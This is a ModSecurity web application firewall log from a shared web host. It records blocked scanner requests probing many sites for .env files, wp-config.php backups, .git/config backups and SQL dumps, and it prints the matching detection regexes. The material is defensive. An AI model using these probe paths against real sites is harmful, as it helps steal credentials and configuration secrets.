[Tue May 26 14:48:52.912066 2026] [security2:error] [pid 648203:tid 648346] [client 45.148.10.5:27814] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/src/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfegAAAJI"]
[Tue May 26 14:48:52.935873 2026] [security2:error] [pid 648203:tid 648244] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php.bak"] [unique_id "ahVlfLEQDDtxJNiDrdTffwABAig"]
[Tue May 26 14:48:52.936257 2026] [security2:error] [pid 648203:tid 648280] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/website/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTffQABAkw"]
[Tue May 26 14:48:52.936798 2026] [security2:error] [pid 648203:tid 648236] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php"] [unique_id "ahVlfLEQDDtxJNiDrdTfgAABAiA"]
[Tue May 26 14:48:52.936863 2026] [security2:error] [pid 648203:tid 648218] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php.new"] [unique_id "ahVlfLEQDDtxJNiDrdTfgQABAg4"]
[Tue May 26 14:48:52.937395 2026] [security2:error] [pid 648203:tid 648226] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php.old"] [unique_id "ahVlfLEQDDtxJNiDrdTfggABAhY"]
[Tue May 26 14:48:52.953732 2026] [security2:error] [pid 648203:tid 648257] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVlfLEQDDtxJNiDrdTfhwAA0DU"]
[Tue May 26 14:48:52.986706 2026] [security2:error] [pid 648203:tid 648349] [client 176.65.139.231:46944] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.rethinkinclusion.org.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfigAAAJU"]
[Tue May 26 14:48:52.986812 2026] [security2:error] [pid 648203:tid 648449] [client 176.65.139.231:46958] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "finclass.africa.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfiwAAAPk"]
[Tue May 26 14:48:53.036392 2026] [security2:error] [pid 648203:tid 648374] [client 176.65.139.236:45504] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.crusties.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTfjAAAAK4"]
[Tue May 26 14:48:53.047947 2026] [security2:error] [pid 648203:tid 648411] [client 74.249.173.207:27845] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/function/function.php"] [unique_id "ahVlfbEQDDtxJNiDrdTfjwAAANM"]
[Tue May 26 14:48:53.108572 2026] [security2:error] [pid 648203:tid 648406] [client 195.178.110.199:60302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTfkQAAAM4"]
[Tue May 26 14:48:53.133003 2026] [security2:error] [pid 648203:tid 648335] [client 176.65.139.231:46974] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.workrepublic.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTfkwAAAIc"]
[Tue May 26 14:48:53.153177 2026] [security2:error] [pid 648203:tid 648459] [client 176.65.139.239:64528] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.couplesspot.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTfmAAAAQM"]
[Tue May 26 14:48:53.154201 2026] [security2:error] [pid 648203:tid 648351] [client 176.65.139.232:19890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.herbalplus.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTfmgAAAJc"]
[Tue May 26 14:48:53.157260 2026] [security2:error] [pid 648203:tid 648424] [client 176.65.139.235:26852] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.agsnails.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTfnAAAAOA"]
[Tue May 26 14:48:53.170078 2026] [security2:error] [pid 648203:tid 648423] [client 176.65.139.233:55938] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landmark.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTfnQAAAN8"]
[Tue May 26 14:48:53.231387 2026] [security2:error] [pid 648203:tid 648358] [client 195.178.110.199:60358] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.landsonlogistics.com"] [uri "/*update.cgi*"] [unique_id "ahVlfbEQDDtxJNiDrdTfpAAAAJ4"]
[Tue May 26 14:48:53.291936 2026] [security2:error] [pid 648203:tid 648448] [client 195.178.110.199:60304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.docker/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTfqgAAAPg"]
[Tue May 26 14:48:53.375841 2026] [security2:error] [pid 648203:tid 648433] [client 195.178.110.199:60352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTfrgAAAOk"]
[Tue May 26 14:48:53.379775 2026] [security2:error] [pid 648203:tid 648384] [client 195.178.110.199:60358] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTfsAAAALg"]
[Tue May 26 14:48:53.429271 2026] [security2:error] [pid 648203:tid 648412] [client 176.65.139.229:64460] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "tedxnutm.org.ng.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTftAAAANQ"]
[Tue May 26 14:48:53.434293 2026] [security2:error] [pid 648203:tid 648418] [client 195.178.110.199:60372] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/backend/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTftwAAANo"]
[Tue May 26 14:48:53.443386 2026] [security2:error] [pid 648203:tid 648355] [client 195.178.110.199:60304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env.backup"] [unique_id "ahVlfbEQDDtxJNiDrdTfuQAAAJs"]
[Tue May 26 14:48:53.865784 2026] [security2:error] [pid 648203:tid 648411] [client 195.178.110.199:60318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env.bak"] [unique_id "ahVlfbEQDDtxJNiDrdTf4AAAANM"]
[Tue May 26 14:48:54.033365 2026] [security2:error] [pid 648203:tid 648398] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlfbEQDDtxJNiDrdTfyQAAAMY"]
[Tue May 26 14:48:54.156200 2026] [security2:error] [pid 648203:tid 648445] [client 195.178.110.199:60292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env.old"] [unique_id "ahVlfrEQDDtxJNiDrdTf7wAAAPU"]
[Tue May 26 14:48:54.192506 2026] [security2:error] [pid 648203:tid 648450] [client 195.178.110.199:60358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/.env.php"] [unique_id "ahVlfrEQDDtxJNiDrdTf8wAAAPo"]
[Tue May 26 14:48:54.306959 2026] [security2:error] [pid 648203:tid 648388] [client 176.65.139.233:55944] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.newnigeria.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfrEQDDtxJNiDrdTf-QAAALw"]
[Tue May 26 14:48:54.310973 2026] [security2:error] [pid 648203:tid 648436] [client 195.178.110.199:60318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env.swp"] [unique_id "ahVlfrEQDDtxJNiDrdTf-wAAAOw"]
[Tue May 26 14:48:54.378480 2026] [security2:error] [pid 648203:tid 648438] [client 195.178.110.199:60420] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env~"] [unique_id "ahVlfrEQDDtxJNiDrdTgAAAAAO4"]
[Tue May 26 14:48:54.566478 2026] [security2:error] [pid 648203:tid 648357] [client 195.178.110.199:60334] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.git/config.old"] [unique_id "ahVlfrEQDDtxJNiDrdTgFQAAAJ0"]
[Tue May 26 14:48:54.572922 2026] [security2:error] [pid 648203:tid 648392] [client 209.50.161.215:43403] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlfbEQDDtxJNiDrdTfwAAAAMA"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:54.844428 2026] [security2:error] [pid 648203:tid 648424] [client 195.178.110.199:60438] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.git/config~"] [unique_id "ahVlfrEQDDtxJNiDrdTgJwAAAOA"]
[Tue May 26 14:48:54.959376 2026] [security2:error] [pid 648203:tid 648354] [client 195.178.110.199:60292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.git/config.bak"] [unique_id "ahVlfrEQDDtxJNiDrdTgLgAAAJo"]
[Tue May 26 14:48:55.010531 2026] [security2:error] [pid 648203:tid 648444] [client 176.65.139.236:45524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "agsnails.com"] [uri "/.env"] [unique_id "ahVlf7EQDDtxJNiDrdTgNAAAAPQ"]
[Tue May 26 14:48:55.051990 2026] [security2:error] [pid 648203:tid 648391] [client 176.65.139.229:64470] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ameritradeng.com"] [uri "/.env"] [unique_id "ahVlf7EQDDtxJNiDrdTgOwAAAL8"]
[Tue May 26 14:48:55.112583 2026] [security2:error] [pid 648203:tid 648445] [client 176.65.139.233:55960] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "strapptech.com"] [uri "/.env"] [unique_id "ahVlf7EQDDtxJNiDrdTgQwAAAPU"]
[Tue May 26 14:48:55.112650 2026] [security2:error] [pid 648203:tid 648405] [client 165.140.119.146:50789] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.119.140.165.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVlfrEQDDtxJNiDrdTgMAAAAM0"], referer: https://www.bloggertarget.com
[Tue May 26 14:48:55.112781 2026] [security2:error] [pid 648203:tid 648405] [client 165.140.119.146:50789] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVlfrEQDDtxJNiDrdTgMAAAAM0"], referer: https://www.bloggertarget.com
[Tue May 26 14:48:55.818454 2026] [security2:error] [pid 648203:tid 648395] [client 45.148.10.5:27814] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/backend/.env"] [unique_id "ahVlf7EQDDtxJNiDrdTgeQAAAMM"]
[Tue May 26 14:48:55.903494 2026] [security2:error] [pid 648203:tid 648370] [client 176.65.139.231:46980] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "tedxnutm.org.ng"] [uri "/.env"] [unique_id "ahVlf7EQDDtxJNiDrdTggAAAAKo"]
[Tue May 26 14:48:55.928044 2026] [security2:error] [pid 648203:tid 648354] [client 176.65.139.229:64486] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.osanctus.org.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlf7EQDDtxJNiDrdTgggAAAJo"]
[Tue May 26 14:48:56.178926 2026] [security2:error] [pid 648203:tid 648343] [client 195.178.110.199:60334] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/API/.env"] [unique_id "ahVlgLEQDDtxJNiDrdTgjwAAAI8"]
